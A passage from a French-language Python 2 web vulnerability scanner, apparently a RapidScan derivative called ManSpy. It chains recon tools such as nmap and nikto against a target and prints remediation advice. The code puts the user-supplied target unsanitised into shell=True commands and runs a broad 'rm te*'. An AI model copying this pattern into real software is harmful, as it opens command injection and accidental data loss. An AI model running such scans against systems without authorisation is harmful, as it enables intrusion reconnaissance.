["open", 0, proc_fible, "<15s", "nmapmysql", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmaporacle", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<15s", "nmapudprdp", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmaptcprdp", ["Impossible de résoudre le problème"]],
["open", 0, proc_haut, "> 50m", "nmapfulltcp", ["Impossible de résoudre"]],
["open", 0, proc_haut, "> 75m", "nmapfulludp", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<30s", "nmapsnmp", ["Impossible de résoudre le problème"]],
["Journal des erreurs de Microsoft SQL Server", 0, proc_fible, "<30s", "elmahxd", ["impossible de résoudre l'adresse de l'host", "Connexion expirée"]],
["open", 0, proc_fible, "<20s", "nmaptcpsmb", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<20s", "nmapudpsmb", ["Impossible de résoudre le problème"]],
["Host:", 0, proc_med, "<5m", "wapiti", ["none"]],
["WebDAV est ENABLED", 0, proc_fible, "<40s", "nmapwebdaviis", ["Échec de la résolution"]],
["X-XSS-Protection [1", 1, proc_med, "<3m", "whatweb", ["Expiration du délai", "Erreur de socket", "X-XSS-Protection [1"]]
]
outils_correctifs = [
[1, "Il ne s'agit pas d'une vulnérabilité, mais simplement d'une alerte informative. L'host ne prend pas en charge IPv6. IPv6 offre davantage de sécurité car IPSec (responsable de CIA - Confidentiality, Integrity and Availablity) est intégré à ce modèle. Il est donc bon d'avoir Prise en charge IPv6. ",
"Il est recommandé de mettre en œuvre IPv6. Vous trouverez plus d'informations sur la mise en oeuvre de IPv6 à partir de cette ressource. Https://www.cisco.com/c/en/us/solutions/collateral/enterprise/cisco-on-cisco/ IPv6-Implementation_CS.html "],
[2, "Fuite d'informations sensibles détectée. L'application ASP.Net ne filtre pas les caractères illégaux dans l'URL. L'attaquant injecte un caractère spécial (% 7C ~ .aspx) pour que l'application crache des informations sensibles sur la pile de serveurs." ,
"Il est recommandé de filtrer les caractères spéciaux dans l'URL et de définir une page d'erreur personnalisée dans de telles situations au lieu d'afficher les messages d'erreur par défaut. Cette ressource vous aide à configurer une page d'erreur personnalisée sur une application Microsoft .Net. Https: // docs.microsoft.com/en-us/aspnet/web-forms/overview/older-versions-getting-started/deploying-web-site-projects/displaying-a-custom-error-page-cs "],
[3, "Il n'est pas mauvais d'avoir un CMS dans WordPress. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de masquer la version de WordPress. Cette ressource contient plus d'informations sur la sécurisation de votre blog WordPress. Https://codex.wordpress.org/Hardening_WordPress"],
[4, "Il n'est pas mauvais d'avoir un CMS dans Drupal. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de dissimuler la version de Drupal. Cette ressource contient des informations supplémentaires sur la sécurisation de votre blog Drupal. Https://www.drupal.org/docs/7/site-building-best-practices/ensure-that- votre-site est sécurisé "],
[5, "Il n'est pas mauvais d'avoir un CMS dans Joomla. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de dissimuler la version de Joomla. Cette ressource contient des informations supplémentaires sur la sécurisation de votre blog Joomla. Https://www.incapsula.com/blog/10-tips-to-improve-your-joomla-website- security.html "],
[6, "Parfois, robots.txt ou sitemap.xml peuvent contenir des règles telles que certains liens auxquels les robots d'exploration et les moteurs de recherche ne sont pas supposés accéder / indexés. Les moteurs de recherche peuvent ignorer ces liens, mais les attaquants pourront y accéder directement. ",
"Il est judicieux de ne pas inclure de liens sensibles dans les robots ou les fichiers de sitemap."],
[7, "Sans pare-feu pour applications Web, un attaquant peut essayer d’injecter divers modèles d’attaque soit manuellement, soit à l’aide de scanners automatisés. Un scanner automatique peut envoyer des hordes de vecteurs d’attaque et des modèles pour valider une attaque. Il existe également des chances que l’application obtenir DoS`ed (déni de service) ",
"Les pare-feu pour applications Web offrent une excellente protection contre les attaques Web courantes telles que XSS, SQLi, etc. Ils offrent également une ligne de défense supplémentaire à votre infrastructure de sécurité. Cette ressource contient des informations sur les pare-feu pour applications Web qui pourraient convenir à votre application. Https: // www .gartner.com / reviews / market / web-application-firewall "],
[8, "Les ports ouverts donnent aux pirates un indice pour exploiter les services. Les pirates tentent de récupérer les informations des bannières par les ports et comprennent le type de service exécuté par l'host",
"Il est recommandé de fermer les ports des services inutilisés et d'utiliser un pare-feu pour filtrer les ports si nécessaire. Cette ressource peut donner davantage d'informations. Https://security.stackexchange.com/a/145781/6137"],
[9, "Il est très moins probable que des adresses e-mail soient utilisées pour compromettre une cible. Toutefois, les attaquants l'utilisent comme donnée complémentaire pour rassembler des informations autour de la cible. Un attaquant peut utiliser le nom d'utilisateur de l'adresse e-mail et mener des attaques en force brutale. sur les serveurs de messagerie, mais également sur d’autres panneaux légitimes tels que SSH, CMS, etc., avec une liste de mots de passe, car ils portent un nom légitime. Il s’agit toutefois d’un scénario dans le noir, l’attaquant pouvant réussir ou non, en fonction du niveau d'intérêt ",
"Etant donné que les chances d’exploitation sont faibles, il n’est pas nécessaire de prendre des mesures. Une réparation appropriée consisterait à choisir différents noms d’utilisateur pour différents services, ce qui serait plus judicieux."],
[10, "Le transfert de zone révèle des informations topologiques critiques sur la cible. L'attaquant sera en mesure d'interroger tous les enregistrements et aura des connaissances plus ou moins complètes sur votre host.",
"La bonne pratique consiste à limiter le transfert de zone en indiquant au maître quelles sont les adresses IP des esclaves auxquels l'accès peut être accordé pour la requête. Cette ressource SANS fournit des informations supplémentaires. Https://www.sans.org/reading-room/ livres blancs / dns / sécuriser-dns-zone-transfer-868 "],
[11, "L’adresse e-mail de l’administrateur et d’autres informations (adresse, téléphone, etc.) sont disponibles publiquement. Un attaquant peut utiliser ces informations pour exploiter une attaque. Ceci ne peut pas être utilisé pour mener une attaque directe, car ce n’est pas le cas. Cependant, un attaquant utilise ces données pour créer des informations sur la cible. ",
"Certains administrateurs auraient intentionnellement rendu ces informations publiques. Dans ce cas, vous pouvez les ignorer. Dans le cas contraire, il est recommandé de les masquer. Cette ressource fournit des informations sur ce correctif. Http://www.name.com/blog/ how-tos / tutorial-2/2013/06 / protégez-vos-informations-personnelles-avec-whois-privacy / "],
[12, "Comme la cible manque de cet en-tête, les anciens navigateurs seront sujets aux attaques XSS réfléchies.",
"Les navigateurs modernes ne rencontrent aucun problème avec cette vulnérabilité (en-têtes manquants). Cependant, il est vivement recommandé aux anciens navigateurs d'être mis à niveau."],
[13, "Cette attaque fonctionne en ouvrant plusieurs connexions simultanées au serveur Web et les maintient en vie aussi longtemps que possible en envoyant en continu des requêtes HTTP partielles, qui ne sont jamais terminées. Elles passent facilement à travers IDS en envoyant des requêtes partielles.",
"Si vous utilisez Apache Module,` mod_antiloris` pourrait vous aider. Pour d'autres configurations, vous pouvez trouver des solutions plus détaillées pour cette ressource. Https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate -apache-http-server / "],
[14, "Cette vulnérabilité porte gravement atteinte à la confidentialité des informations privées de votre host. Un attaquant peut maintenir la connexion TLS vivante et récupérer au maximum 64 Ko de données par battement de coeur.",
"PFS (Perfect Forward Secrecy) peut être implémenté pour rendre le décryptage difficile. Des informations complètes sur les mesures correctives et les ressources sont disponibles à l'adresse http://heartbleed.com/"],
[15, "By exploiting this vulnerability, an attacker will be able gain access to sensitive data in a n encrypted session such as session ids, cookies and with those data obtained, will be able to impersonate that particular user.",
"This is a flaw in the SSL 3.0 Protocol. A better remediation would be to disable using the SSL 3.0 protocol. For more information, check this resource. https://www.us-cert.gov/ncas/alerts/TA14-290A"],
[16, "This attacks takes place in the SSL Negotiation (Handshake) which makes the client unaware of the attack. By successfully altering the handshake, the attacker will be able to pry on all the information that is sent from the client to server and vice-versa",
"Upgrading OpenSSL to latest versions will mitigate this issue. This resource gives more information about the vulnerability and the associated remediation. http://ccsinjection.lepidum.co.jp/"],
[17, "Avec cette vulnérabilité, l'attaquant sera en mesure de mener une attaque par MiTM et de compromettre ainsi le facteur de confidentialité.",
"La mise à niveau de OpenSSL vers la dernière version résoudra ce problème. Les versions antérieures à 1.1.0 sont exposées à cette vulnérabilité. Vous trouverez plus d'informations dans cette ressource. Https://bobcares.com/blog/how-to-fix-sweet32- anniversaires-vulnérabilité-cve-2016-2183 / "],
[18, "Avec l'attaque LogJam, l'attaquant sera en mesure de rétrograder la connexion TLS, ce qui lui permettra de lire et de modifier les données transmises via la connexion.",
"Assurez-vous que toutes les bibliothèques TLS que vous utilisez sont à jour, que les serveurs que vous maintenez utilisent des nombres premiers de 2048 bits ou plus, et que les clients que vous gérez rejettent les nombres principaux de Diffie-Hellman inférieurs à 1024 bits. Pour plus d'informations, reportez-vous à la section ressource. https://weakdh.org/ "],
[19, "Autorise des attaquants distants à provoquer un déni de service (plantage) et éventuellement à obtenir des informations sensibles dans les applications qui utilisent OpenSSL, via un message de négociation ClientHello malformé déclenchant un accès mémoire en dehors des limites."
"Les versions OpenSSL 0.9.8h à 0.9.8q et 1.0.0 à 1.0.0c sont vulnérables. Il est recommandé de mettre à niveau la version OpenSSL. Vous trouverez plus de ressources et d’informations ici. Https://www.openssl.org/news /secadv/20110208.txt "],
[20, "autrement appelé BREACH atack, exploite la compression dans le protocole HTTP sous-jacent. Un attaquant sera en mesure d'obtenir des adresses électroniques, des jetons de session, etc., à partir du trafic Web crypté TLS.",
"Désactiver la compression TLS n'atténue pas cette vulnérabilité. La première étape consiste à désactiver la compression Zlib, suivie des autres mesures mentionnées dans cette ressource. Http://breachattack.com/"],
[21, "Appelée autrement attaque par texte brut, qui permet aux attaquants de MiTM d’insérer des données dans des sessions HTTPS et éventuellement d’autres types de sessions protégées par TLS ou SSL, en envoyant une demande non authentifiée traitée rétroactivement par un serveur contexte post-renégociation. ",
"Les étapes détaillées de la correction peuvent être trouvées dans ces ressources. Https://securingtomorrow.mcafee.com/technical-how-to/tips-securing-ssl-renegotiation/ https://www.digicert.com/news/2011- 06-03-ssl-renego / "],
[22, "Cette vulnérabilité permet à des attaquants de voler des sessions TLS existantes à des utilisateurs.",
"Le meilleur conseil est de désactiver la reprise de session. Pour renforcer la reprise de session, suivez cette ressource qui contient des informations considérables. Https://wiki.crashtest-security.com/display/KB/Harden+TLS+Session+Resumption"],
[23, "Cela n'a rien à voir avec les risques de sécurité. Toutefois, les attaquants peuvent utiliser cette indisponibilité d'équilibreurs de charge comme un avantage pour exploiter une attaque par déni de service sur certains services ou sur l'application elle-même."
"Les équilibreurs de charge sont fortement encouragés pour toutes les applications Web. Ils améliorent les performances et la disponibilité des données en cas de panne du serveur. Pour en savoir plus sur les équilibreurs de charge et leur configuration, consultez cette ressource. Https: //www.digitalocean. com / communauté / tutoriels / qu'est-ce que l'équilibrage de charge "],
[24, "Un attaquant peut transmettre des requêtes arrivant à l'URL légitime ou à l'application Web à une adresse tierce ou à l'emplacement de l'attaquant pouvant servir de logiciel malveillant et affecter l'ordinateur de l'utilisateur final.",
"Il est vivement recommandé de déployer DNSSec sur la cible de l'host. Le déploiement complet de DNSSEC garantit que l'utilisateur final se connecte au site Web ou à un autre service correspondant à un nom de domaine particulier. Pour plus d'informations, consultez cette ressource. Https: / /www.cloudflare.com/dns/dnssec/how-dnssec-works/ "],
[25, "Les attaquants peuvent trouver une quantité considérable d'informations dans ces fichiers. Il existe même des chances que les attaquants obtiennent des informations critiques à partir de ces fichiers.",
"Il est recommandé de bloquer ou de restreindre l'accès à ces fichiers, sauf en cas de nécessité."],
[26, "Les attaquants peuvent trouver une quantité considérable d'informations dans ces répertoires. Il existe même des chances que les attaquants obtiennent des informations critiques à partir de ces répertoires.",
"Il est recommandé de bloquer ou de restreindre l'accès à ces répertoires, sauf en cas de nécessité."],
[27, "Peut ne pas être vulnérable SQLi. Un attaquant sera en mesure de savoir que l'host utilise un backend pour l'opération.",
"La capture de bannières devrait être restreinte et l'accès aux services de l'extérieur devrait être réduit au minimum."],
[28, "Un attaquant sera capable de voler des cookies, de déformer une application Web ou de se rediriger vers une adresse tierce pouvant servir de logiciel malveillant.",
"La validation des entrées et la désinfection des sorties peuvent totalement empêcher les attaques XSS. Les attaques XSS peuvent être atténuées à l'avenir en suivant correctement une méthodologie de codage sécurisé. La ressource complète suivante fournit des informations détaillées sur la résolution de cette vulnérabilité. Https: // www. owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet "],
[29, "Des vulnérabilités liées à SSL annulent le facteur de confidentialité. Un attaquant peut effectuer une attaque par MiTM, intrépéter et espionner la communication.",
"Une mise en œuvre correcte et une version mise à niveau des bibliothèques SSL et TLS sont essentielles pour bloquer les vulnérabilités liées à SSL."],
[30, "Un scanner particulier a détecté plusieurs vulnérabilités qu'un attaquant pourrait tenter d'exploiter la cible.",
"Reportez-vous à MS-Rapport-de-vulnérabilite pour afficher les informations complètes de la vulnérabilité, une fois l'analyse terminée."],
[31, "Les attaquants peuvent collecter davantage d'informations sur les sous-domaines relatifs au domaine parent. Ils peuvent même rechercher d'autres services dans les sous-domaines et essayer de connaître l'architecture de la cible. L'attaquant a même des chances de trouver des vulnérabilités en tant que surface d'attaque. devient plus grand avec plus de sous-domaines découverts. ",
"Il est parfois sage de bloquer les sous-domaines tels que le développement, le déploiement vers le monde extérieur, car cela donne plus d'informations à l'attaquant sur la pile technologique. Les pratiques de nommage complexes permettent également de réduire la surface d'attaque, car les attaquants ont du mal à exécuter le sous-domaine dictionnaires et listes de mots. "],
[32, "Grâce à ce protocole obsolète, un attaquant peut être capable de mener MiTM et d'autres attaques compliquées.",
"Il est vivement recommandé de cesser d'utiliser ce service, qui est largement obsolète. SSH peut être utilisé pour remplacer TELNET. Pour plus d'informations, consultez cette ressource https://www.ssh.com/ssh/telnet"],
[33, "Ce protocole ne prend pas en charge les communications sécurisées et l’attaquant a probablement de grandes chances d’écouter la communication. En outre, de nombreux programmes FTP disposent d’exploits disponibles sur le Web, de sorte qu’un attaquant peut planter directement l’application ou obtenir un SHELL. accès à cette cible. ",
"Le correctif suggéré consiste à utiliser un protocole SSH au lieu de FTP. Il prend en charge la communication sécurisée et les chances d'attaques de MiTM sont plutôt rares."],
[34, "Le StuxNet est un ver 'worm' de niveau 3 qui expose des informations critiques sur l’organisation cible. Il s’agissait d’une cyberarme qui visait à contrecarrer le renseignement nucléaire iranien. Je me demande comment elle est arrivée ici? J'espère que ce n’est pas une fausse Nmap positif;) ",
"Il est vivement recommandé d'effectuer une analyse complète des rootkit sur l'host. Pour plus d'informations, consultez cette ressource. Https://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99&tabid=3 "],
[35, "WebDAV est supposé contenir plusieurs vulnérabilités. Dans certains cas, un attaquant peut cacher un fichier DLL malveillant dans le partage WebDAV mais, après avoir convaincu un utilisateur d'ouvrir un fichier parfaitement inoffensif et légitime, exécuter du code dans le contexte de cet utilisateur ",
"Il est recommandé de désactiver WebDAV. Vous trouverez sur cette URL des ressources critiques concernant la désactivation de WebDAV. Https://www.networkworld.com/article/2202909/network-security/-webdav-is-bad---says- security-researcher.html "],
[36, "Les attaquants font toujours une empreinte digitale sur n'importe quel serveur avant de lancer une attaque. Empreinte digitale leur donne des informations sur le type de serveur, le contenu qu'ils servent, les dernières heures de modification, etc., cela donne à un attaquant plus d'informations sur la cible" ,
"Une bonne pratique consiste à masquer les informations au monde extérieur. Dans ce cas, les attaquants auront du mal à comprendre la technologie du serveur et par conséquent à tirer parti d'une attaque."],
[37, "Les pirates tentent généralement de rendre inutilisables les applications ou les services Web en inondant la cible, en bloquant l'accès aux utilisateurs légitimes. Cela peut affecter les activités d'une entreprise ou d'une organisation ainsi que la réputation",
"En veillant à ce que les équilibreurs de charge appropriés soient en place, en configurant des limites de débit et de multiples restrictions de connexion, ces attaques peuvent être considérablement atténuées."],
[38, "Les intrus pourront inclure à distance des fichiers shell et accéder au système de fichiers principal. Ils pourront également lire tous les fichiers. Il est encore plus probable que l’attaquant exécute du code à distance système de fichiers.",
"Les pratiques en matière de code sécurisé préviendront principalement les attaques par LFI, RFI et RCE. La ressource suivante fournit des informations détaillées sur les pratiques de codage sécurisé. Https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+ Codage + Pratiques "],
[39, "Les pirates seront capables de voler des données sur le backend. Ils pourront également s’authentifier sur le site et se faire passer pour n'importe quel utilisateur car ils ont le contrôle total sur le backend. Ils peuvent même effacer toute la base de données. Les attaquants peuvent aussi voler les informations de cookie d'un utilisateur authentifié et il peut même rediriger la cible vers une adresse malveillante ou altérer totalement l'application. ",
"La validation des entrées doit être effectuée correctement avant toute interrogation directe des informations de la base de données. Un développeur doit se rappeler de ne pas faire confiance aux entrées des utilisateurs finaux. En suivant une méthodologie de codage sécurisé, attaquez comme SQLi, XSS et BSQLi. Les guides de ressources suivants mettre en œuvre une méthodologie de codage sécurisé pour le développement d'applications. https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices "],
[40, "Des attaquants exploitent la vulnérabilité de BASH pour exécuter du code à distance sur la cible. Un attaquant expérimenté peut facilement prendre le contrôle du système cible et accéder aux sources internes de la machine",
"Cette vulnérabilité peut être atténuée en appliquant un correctif à la version de BASH. La ressource suivante fournit une analyse approfondie de la vulnérabilité et de la façon de la réduire. Https://www.symantec.com/connect/blogs/shellshock-all-you-need -know-about-bash-bug-vulnérabilité https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-vulnerability "],
[41, "Donne à l'attaquant une idée de la façon dont la configuration des adresses est effectuée en interne sur le réseau de l'organisation. La découverte des adresses privées utilisées au sein d'une organisation peut aider les attaquants à mener des attaques au niveau de la couche réseau visant à pénétrer l'infrastructure interne de l'entreprise.",
"Limiter les informations de la bannière au monde extérieur à partir du service de publication. Plus d'informations sur la réduction de cette vulnérabilité peuvent être trouvées ici. Https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed"],
[42, "Un attaquant a des chances de manipuler des fichiers sur le serveur Web.",
"Il est recommandé de désactiver les méthodes HTTP PUT et DEL si vous n'utilisez pas de services d'API REST. Les ressources suivantes vous aident à désactiver ces méthodes. Http://www.techstacks.com/howto/disable-http- methods-in-tomcat.html https://docs.oracle.com/cd/E19857-01/820-5627/gghwc/index.html https://developer.ibm.com/answers/questions/321629/how- désactiver-méthodes-http-head-put-delete-option / "],
[43, "Les attaquants essaient d'en savoir plus sur la cible grâce à la quantité d'informations exposées dans les en-têtes. Un attaquant peut savoir quel type de pile technologique une application Web met en valeur et de nombreuses autres informations.",
"La capture de bannières devrait être restreinte et l'accès aux services de l'extérieur devrait être réduit au minimum."],
[44, "Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait lire des données, telles que l'état d'affichage, qui était chiffré par le serveur. Cette vulnérabilité peut également être utilisée pour la falsification de données, qui, si elle est exploitée correctement, peut être utilisée pour le déchiffrement et la sauvegarde. altérer les données cryptées par le serveur. ",
"Microsoft a publié une série de correctifs sur son site Web afin d'atténuer ce problème. Les informations requises pour corriger cette vulnérabilité peuvent être déduites de cette ressource. Https://docs.microsoft.com/en-us/security-updates/securitybulletins/ 2010 / ms10-070 "],
[45, "Tout serveur Web obsolète peut contenir plusieurs vulnérabilités, car leur assistance aurait pris fin. Un attaquant peut utiliser cette opportunité pour exploiter ses attaques.",
"Il est vivement recommandé de mettre à niveau le serveur Web vers la dernière version disponible."],
[46, "Les pirates seront en mesure de manipuler les URL facilement via une requête GET / POST. Ils pourront injecter facilement plusieurs vecteurs d'attaque dans l'URL et être en mesure de surveiller la réponse",
"En garantissant des techniques de désinfection appropriées et en utilisant des pratiques de codage sécurisées, il sera impossible à l'attaquant de pénétrer à travers. La ressource suivante donne un aperçu détaillé des pratiques de codage sécurisées. Https://wiki.sei.cmu.edu/confluence/display/ seccode / Top + 10 + Secure + Coding + Practices "],
[47, "Puisque l'attaquant a connaissance du type de serveur utilisé par la cible, il pourra lancer un exploit ciblé pour la version en question. Il peut également essayer de s'authentifier à l'aide des informations d'identification par défaut.",
"Des correctifs de sécurité opportuns pour le système doivent être installés. Les informations d'identification par défaut doivent être modifiées. Si possible, les informations de la bannière peuvent être modifiées pour tromper l'attaquant. La ressource suivante fournit des informations supplémentaires sur la sécurisation de votre système. Http: // kb.bodhost.com/secure-database-server/ "],
[48, "Les attaquants peuvent lancer des exploits distants pour faire planter le service ou utiliser des outils tels que ncrack pour essayer de forcer brute le mot de passe sur la cible.",
"Il est recommandé de bloquer le service vers le monde extérieur et de le rendre accessible uniquement via un ensemble d'adresses IP autorisées uniquement. Cette ressource fournit des informations sur les risques, ainsi que sur les étapes permettant de bloquer le service. Https: / /www.perspectiverisk.com/remote-desktop-service-vulnerabilities/ "],
[49, "Les pirates seront en mesure de lire les chaînes de la communauté via le service et d'énumérer toute une information de la cible. De plus, il existe plusieurs vulnérabilités d'exécution de code à distance et de déni de service liées aux services SNMP.",
"Utilisez un pare-feu pour bloquer les ports du monde extérieur. L'article suivant donne un aperçu du verrouillage du service SNMP. Https://www.techrepublic.com/article/lock-it-down-dont-allow-snmp-to -compromise-network-security / "],
[50, "Les attaquants pourront trouver les journaux et les informations d'erreur générés par l'application. Ils pourront également voir les codes d'état générés sur l'application. En combinant toutes ces informations, l'attaquant sera en mesure d'exploiter une attaque.",
"En limitant l'accès à l'application de journalisation du monde extérieur, cela sera amplement suffisant pour atténuer cette faiblesse."],
[51, "Les cybercriminels ciblent principalement ce service car il leur est très facile de mener une attaque à distance en exécutant des exploits. WannaCry Ransomware par exemple.",
"Exposer le service SMB au monde extérieur est une mauvaise idée. Il est recommandé d’installer les derniers correctifs pour le service afin de ne pas compromettre. La ressource suivante fournit des informations détaillées sur les concepts de SMB Hardening. Https: //kb.iweb. com / hc / fr-fr / articles / 115000274491-Sécurisation-Windows-SMB-et-NetBios-NetBT-Services "]
]
precheck_outils = [
["wapiti"], ["whatweb"], ["nmap"], ["golismero"], ["host"], ["wget"], ["uniscan"], ["wafw00f"], ["dirb"], ["davtest"], ["theharvester"], ["xsser"], ["dnsrecon"],["fierce"], ["dnswalk"], ["mansour"], ["whois"], ["sslyze"], ["lbd"], ["golismero"], ["dnsenum"],["dmitry"], ["davtest"], ["nikto"], ["dnsmap"]
]
scan_shuffle = list(zip(noms_outils, cmd_outils, rep_outil, outils_status))
random.shuffle(scan_shuffle)
noms_outils, cmd_outils, rep_outil, outils_status = zip(*scan_shuffle)
tool_checks = (len(noms_outils) + len(rep_outil) + len(outils_status)) / 3
tool = 0
runTest = 1
arg1 = 0
arg2 = 1
arg3 = 2
arg4 = 3
arg5 = 4
arg6 = 5
# Detectevul
rs_vul_list = list()
rs_vul_num = 0
rs_vul = 0
rs_total_elapsed = 0
rs_avail_tools = 0
rs_skipped_checks = 0
if len(sys.argv) == 1 :
logo()
helper()
else:
target = sys.argv[1].lower()
#Vérifier tout d'abord la connectivité...
ms_internet_dispo = verifier_internet()
if ms_internet_dispo == 0:
print ("\t"+ bcolors.BG_ERR_TXT + "Il semble y avoir un problème de connexion à Internet. Veuillez réessayer ou plus tard." +bcolors.ENDC)
sys.exit(1)
elif target == '--help' or target == '-h' or target == '--h':
logo()
helper()
sys.exit(1)
else:
target = url_maker(target)
os.system('rm te* > /dev/null 2>&1') #Effacement des fichiers d'analyse précédents
os.system('clear')
os.system('setterm -cursor off')
logo()
print bcolors.BG_HEAD_TXT+"[ Vérification des outils d'analyses disponibles... Initiée. ]"+bcolors.ENDC
indispo_outils = 0
indispo_outils_noms = list()
while (rs_avail_tools < len(precheck_outils)):
precmd = str(precheck_outils[rs_avail_tools][arg1])
try:
p = subprocess.Popen([precmd], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True)
output, err = p.communicate()
val = output + err
except:
print "\t"+bcolors.BG_ERR_TXT+"ManSpy a été arreté d'une manière brusque...!!"+bcolors.ENDC
sys.exit(1)
if "not found" in val:
print "\t"+bcolors.TBLUE+precheck_outils[rs_avail_tools][arg1]+bcolors.ENDC+bcolors.BADFAIL+"...indisponible."+bcolors.ENDC
for scanner_index, scanner_val in enumerate(noms_outils):
if scanner_val[2] == precheck_outils[rs_avail_tools][arg1]:
scanner_val[3] = 0 #désactiver le scanner car il n'est pas disponible.
indispo_outils_noms.append(precheck_outils[rs_avail_tools][arg1])
indispo_outils = indispo_outils + 1
else:
print "\t"+bcolors.TBLUE+precheck_outils[rs_avail_tools][arg1]+bcolors.ENDC+bcolors.TGREEN+"...disponible."+bcolors.ENDC
rs_avail_tools = rs_avail_tools + 1
clear()
indispo_outils_noms = list(set(indispo_outils_noms))
if indispo_outils == 0:
print "\t"+bcolors.TGREEN+"Tous les outils d'analyse sont disponibles. Tous les contrôles de vulnérabilité seront effectués par ManSpy."+bcolors.ENDC
else:
print "\t"+bcolors.WARNING+"Certains de ces outils "+bcolors.BADFAIL+str(indispo_outils_noms)+bcolors.ENDC+bcolors.WARNING+" sont indisponibles. ManSpy peut toujours effectuer des tests en excluant ces outils des tests. Veuillez installer ces outils pour utiliser pleinement les fonctionnalités de ManSpy."+bcolors.ENDC
print bcolors.BG_ENDL_TXT+"[ Vérification des outils d'analyses disponibles... Terminé. ]"+bcolors.ENDC
print "\n"
print bcolors.BG_HEAD_TXT+"[Phase d'analyse préliminaire lancée ... chargée "+str(tool_checks)+" vulnerability checks. ]"+bcolors.ENDC
#while (tool < 1):
while(tool < len(noms_outils)):
print "["+outils_status[tool][arg3]+outils_status[tool][arg4]+"] Déploiement "+str(tool+1)+"/"+str(tool_checks)+" | "+bcolors.TBLUE+noms_outils[tool][arg2]+bcolors.ENDC,
if noms_outils[tool][arg4] == 0:
print bcolors.WARNING+"...Outil d'analyse non disponible. sauté le test automatiquement..."+bcolors.ENDC
rs_skipped_checks = rs_skipped_checks + 1
tool = tool + 1
continue
spinner.start()
scan_start = time.time()
temp_file = "temp_"+noms_outils[tool][arg1]
cmd = cmd_outils[tool][arg1]+target+cmd_outils[tool][arg2]+" > "+temp_file+" 2>&1"
try:
subprocess.check_output(cmd, shell=True)
except KeyboardInterrupt:
runTest = 0
except:
runTest = 1
if runTest == 1:
spinner.stop()
scan_stop = time.time()
elapsed = scan_stop - scan_start
rs_total_elapsed = rs_total_elapsed + elapsed
print bcolors.TBLUE+"\b...Terminé en "+display_time(int(elapsed))+bcolors.ENDC+"\n"
clear()
rs_tool_output_file = open(temp_file).read()
if outils_status[tool][arg2] == 0:
if outils_status[tool][arg1].lower() in rs_tool_output_file.lower():
#print "\t"+ vul_info(rep_outil[tool][arg2]) + bcolors.BADFAIL +" "+ rep_outil[tool][arg1] + bcolors.ENDC
vul_as_info(tool,rep_outil[tool][arg2],rep_outil[tool][arg3])
rs_vul_list.append(noms_outils[tool][arg1]+"*"+noms_outils[tool][arg2])
else:
if any(i in rs_tool_output_file for i in outils_status[tool][arg6]):
m = 1 # makadir walou.
else:
#print "\t"+ vul_info(rep_outil[tool][arg2]) + bcolors.BADFAIL +" "+ rep_outil[tool][arg1] + bcolors.ENDC
vul_as_info(tool,rep_outil[tool][arg2],rep_outil[tool][arg3])
rs_vul_list.append(noms_outils[tool][arg1]+"*"+noms_outils[tool][arg2])
else:
runTest = 1
spinner.stop()
scan_stop = time.time()
elapsed = scan_stop - scan_start
rs_total_elapsed = rs_total_elapsed + elapsed
print bcolors.TBLUE+"\b\b\b\b...Interrompu dans "+display_time(int(elapsed))+bcolors.ENDC+"\n"
clear()
print "\t"+bcolors.WARNING + "Test ignoré. Effectuer Suivant. Appuyez sur Ctrl + Z pour quitter ManSpy." + bcolors.ENDC
rs_skipped_checks = rs_skipped_checks + 1
tool=tool+1
print bcolors.BG_ENDL_TXT+"[ l'analyse préliminaire est terminée.. ]"+bcolors.ENDC
print "\n"
#################### Phase de rapport et de documentation ###########################
print bcolors.BG_HEAD_TXT+"[ Phase de génération de rapport lancée. ]"+bcolors.ENDC
if len(rs_vul_list)==0:
print "\t"+bcolors.TGREEN+"Aucune vulnérabilité détectée."+bcolors.ENDC
else:
with open("MS-Rapport-de-vulnérabilite", "a") as report:
while(rs_vul < len(rs_vul_list)):
vuln_info = rs_vul_list[rs_vul].split('*')
report.write(vuln_info[arg2])
report.write("\n------------------------\n\n")
temp_report_name = "temp_"+vuln_info[arg1]
with open(temp_report_name, 'r') as temp_report:
data = temp_report.read()
report.write(data)
report.write("\n\n")
temp_report.close()
rs_vul = rs_vul + 1
print "\tRapport de vulnérabilité complet pour "+bcolors.TBLUE+target+bcolors.ENDC+" named "+bcolors.TGREEN+"`MS-Rapport-de-vulnérabilite`"+bcolors.ENDC+" est disponible dans le même répertoire que RapidScan se trouve."
report.close()
# Écrire tous les fichiers numérisés dans le journal MS-Debug à des fins de débogage.
for file_index, file_name in enumerate(noms_outils):
with open("MS-Debug-ScLog", "a") as report:
try:
with open("temp_"+file_name[arg1], 'r') as temp_report:
data = temp_report.read()
report.write(file_name[arg2])
report.write("\n------------------------\n\n")
report.write(data)
report.write("\n\n")
temp_report.close()
except:
break
report.close()
print "\tNombre total de vulnérabilité controles : "+bcolors.BOLD+bcolors.TGREEN+str(len(noms_outils))+bcolors.ENDC
print "\tNombre total de vérifications de vulnérabilité ignorées: "+bcolors.BOLD+bcolors.WARNING+str(rs_skipped_checks)+bcolors.ENDC
print "\tNombre total de vulnérabilités détectées : "+bcolors.BOLD+bcolors.BADFAIL+str(len(rs_vul_list))+bcolors.ENDC
print "\tTemps total écoulé pour l'analyse : "+bcolors.BOLD+bcolors.TBLUE+display_time(int(rs_total_elapsed))+bcolors.ENDC
print "\n"
